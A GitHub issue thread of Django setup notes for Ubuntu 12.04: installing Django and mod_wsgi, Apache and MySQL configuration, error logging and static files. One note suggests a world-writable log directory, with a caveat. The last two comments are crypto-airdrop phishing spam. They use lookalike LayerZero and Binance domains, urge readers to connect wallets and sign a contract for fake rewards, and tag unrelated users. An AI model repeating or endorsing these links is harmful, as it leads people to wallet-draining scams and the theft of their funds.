### ISSUE TITLE
Setup Django

### ISSUE THREAD

**Issue by blukat29** [blukat29/blukat-config#2]
Assume 
- Python 2.4~2.7 (3.x not yet supported)
- Apache 2.2
- MySQL

are installed on Ubuntu 12.04
Also, `django-admin` showed `1.6.5`.
**DJANGO VERSION MUST MATCH**.
As mentioned in the official documentation, django significantly differs across releases.
## Python django module

https://docs.djangoproject.com/en/1.2/intro/install/ 
Latest official release from https://www.djangoproject.com/download/

``` sh
sudo apt-get install python-django
```
## Apache mod_wsgi module

http://wikipbx.subwiki.com/install-mod-wgi
### Install mod_wsgi

``` sh
sudo apt-get install libapache2-mod-wsgi
sudo /etc/init.d/apache2 restart
```
### Link apache2 with mod_wsgi

First create a load script.

``` sh
cd /etc/apache2
sudo vi mods-available/mod_wsgi.load
```

`mod_wsgi.load` contains 

```
LoadModule wsgi_module /usr/lib/apache2/modules/mod_wsgi.so
```

Then link from mods-enabled.

``` sh
cd /etc/apache2/mods-enabled
sudo ln -s ../mods-available/mod_wsgi.load mod_wsgi.load
# sudo ln -s ../mods-available/mod_wsgi.conf mod_wsgi.conf
```
### with an empty django project

``` sh
cd path/to/workspace
django-admin startproject sample
cd /etc/apache2
sudo vi httpd.conf
```

`httpd.conf` contains

```
WSGIScriptAlias /wsgi /path/to/workspace/sample/sample/wsgi.py
WSGIPythonPath /path/to/workspace/sample
<Directory /path/to/workspace/sample/sample>
    Order allow,deny
    Allow from all
</Directory>
```

Finally open the browser and go to http://the.doma.in/wsgi

**Comment by blukat29** [comment]
## Connect to MySQL

``` sh
sudo apt-get install python-mysqldb
```

And in `settings.py`

``` python
DATABASES = {
    'default' : {
        'ENGINE' : 'django.db.backends.mysql',
        'NAME' : '____'
        'USER' : '____'
        'PASSWORD' : '____'
    }
}
```

The NAME field specifies the database name, which should already exist. If not, create one using mysql directly.

**Comment by blukat29** [comment]
## Django web site structure

In Django, a web site is a [Python module](https://docs.python.org/2/tutorial/modules.html#packages) and an app is an submodule.

```
mysite/         # Project container.
    manage.py       # project manager script.

    mysite/         # the project, as a python module.
        __init__.py
        settings.py     # project settings (DB, logging, ...)
        urls.py         # Url redirection rules. Maps urls to apps.
        wsgi.py         # WSGI application definition.

        bbs/            # A bbs app.
            __init__.py
            models.py       # Define data structures in bbs.
            views.py        # Define representation in bbs.
            tests.py        # Define test cases in bbs. (using asserts)

        game/           # A game app.
            __init__.py
            models.py
            views.py
            tests.py

```

### manage.py commands

#### general commands

`runserver` Starts the development server.
`startapp [app_name]` Creates an app.
`test` Tests all test cases.

#### database commands

`syncdb` Updates changes in models and commits to the database. Try `show tables;` inside MySQL to see changes.
`sql [app_name]` Prints SQL statements for those who want to do `syncdb` manually.
`validate` Finds any error in models.
`sqlclear [app_name]` Prints SQL statements that deletes all tables used by the specified app.

**Comment by blukat29** [comment]
## Error logging

### Apache error

`/var/log/apache2/access.log` and `/var/log/apache2/error.log`
Timestapms can be inaccurate due to wrong timezone setting.

### Django error logging in a file

Before proceed, prepare a free-to-write directory.
In Ubuntu, Apache is running under username `www-data`.
So placing a log file in the project directory or so will not work.

``` sh
cd /var/log
sudo mkdir django
sudo chown www-data django
```

OR if security is not so important,

``` sh
cd /tmp
mkdir django-log
sudo chmod 777 django-log
```

in `settings.py`,

``` python
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {
        'verbose': {
            'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
        },
    },
    'handlers': {
        'log_file' : {
            'level' : 'ERROR',
            'class' : 'logging.FileHandler',
            'filename' : '/var/log/django/sample.error.log',
            'formatter': 'verbose',
        },
    },
    'loggers': {
        'django.request': {
            'handlers': ['log_file'],
            'level': 'ERROR',
            'propagate': True,
        },
    }
}
```

**Comment by blukat29** [comment]
# Upgrade django

``` sh
sudo apt-get install python-setuptools
sudo easy_install --upgrade django
```

**Comment by blukat29** [comment]
## Serving Static Files

http://mark.hungrybugger.co.uk/2013/django-admin-css-missing-a-2013-solution/
1. Assume `settings.py` says `STATIC_URL = '/static/'`
2. in `settings.py` set `STATIC_ROOT = '/var/www/static/'` or so.
   This is the physical location where static files are stored.
3. run `sudo python manage.py collectstatic`.
   This will find all required static files in my project and copy them into designated `STATIC_ROOT`.
   Admin css are also copied.
4. Add a line in Apache `httpd.conf` as follows: `Alias /static /path/to/actual/static/files`
   This line must be before `WSGIScriptAlias`.

**Comment by bpieres** [comment]
### LayerZero Airdrop Guide: BIGGEST Airdrop in 2023 ($ZRO Token Confirmed) 🪂

LayerZero is one of the most ANTICIPATED airdrops in 2023, and users can potentially earn up to $10,000 in airdrop rewards! This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Claim Now on Layerzero Oficial](http://link.layerzer0network.online/rFz335)

![Claim Now](https://i.ytimg.com/vi/s7BR96pg0SA/sddefault.jpg)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).
   - 
2. **Share on Social Media:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Instagram:**
     [Share on Reddit](https://reddit.com/submit?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&title=LayerZero+Airdrop+Guide) 

2. **Eligibility Check:**
   - Confirm your eligibility for the Layerzero Airdrop.

**Comment by softgetix** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🌟 Exciting News! 🎉 You're in for a treat! 🚀 You've just hit the jackpot and secured your spot in the $1.5k Binance Airdrop! 🤑 Brace yourself for an amazing windfall of $1500 in BNB. But that's not all – here's the cherry on top: Connect now, and enjoy an instant bonus of $100! 🚀 Don't miss out on this golden opportunity. Follow the simple steps below to claim your tokens and elevate the joy of this spectacular giveaway! 🌈

[![Claim Now](https://pbs.twimg.com/media/FgeJoNLaMAAqLfx.jpg:large)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @fadeAce, @balakef, @mohammadali-bacha, @lukemiloszewski, @antonper, @jmconrad, @simonmullaney
